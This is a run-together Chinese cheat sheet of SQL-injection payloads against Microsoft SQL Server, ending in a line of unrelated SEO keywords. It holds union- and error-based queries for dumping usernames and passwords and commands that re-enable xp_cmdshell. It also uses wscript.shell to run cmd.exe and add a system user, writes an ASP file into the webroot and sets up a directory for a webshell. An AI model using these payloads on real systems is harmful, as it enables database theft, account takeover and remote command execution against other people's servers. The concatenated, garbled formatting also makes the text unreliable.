sp_addextendedproc 'xp_webserver', 'c:/temp/xp_foo.dll'exec xp_webserversp_dropextendedproc 'xp_webserver'bcp "select * FROM test..foo" queryout c:/inetpub/wwwroot/runcommand.asp -c -Slocalhost -Usa -Pfoobar' group by users.id having 1=1-' group by users.id, users.username, users.password, users.privs having 1=1-'; insert into users values( 666, 'attacker', 'foobar', 0xffff )-union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable'-union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' where COLUMN_NAME NOT IN ('login_id')-union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' where COLUMN_NAME NOT IN ('login_id','login_name')-union select TOP 1 login_name FROM logintable-union select TOP 1 password FROM logintable where login_name='Rahul'-- 构造语句:查询是否存在xp_cmdshell
' union select @@version,1,1,1--and 1=(select @@VERSION)and 'sa'=(select System_user)' union select ret,1,1,1 from foo--' union select min(username),1,1,1 from users where username > 'a'-' union select min(username),1,1,1 from users where username > 'admin'-' union select password,1,1,1 from users where username = 'admin'-- and user_name()='dbo'and 0<>(select user_name()-; DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:/WINNT/system32/cmd.exe /c net user swap 5245886 /add'and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell');EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'1=( select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell')and 1=(select IS_SRVROLEMEMBER('sysadmin')) 判断sa权限是否and 0<>(select top 1 paths from newtable)-- 暴库大法and 1=(select name from master.dbo.sysdatabases where dbid=7) 得到库名(从1到5都是系统的id,6以上才可以判断)
创建一个虚拟目录E盘:
declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c:/inetpub/wwwroot/mkwebdir.vbs -w "默认 Web 站点" -v "e","e:/"'访问属性:(配合写入一个webshell)declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c:/inetpub/wwwroot/chaccess.vbs -a w3svc/1/ROOT/e +browse'and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) 依次提交 dbid = 7,8,9.... 得到更多的数据库名and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 暴到一个表 假设为 adminand 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('Admin')) 来得到其他的表。and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id))) 暴到UID的数值假设为18779569 uid=idand 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一个admin的一个字段,假设为 user_idand 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in ('id',...)) 来暴出其他的字段and 0<(select user_id from BBS.dbo.admin where username>1)
关键字:软件 服务器 qq os msn dos 美女 电影 小说 音乐 无极 汽车 MP3
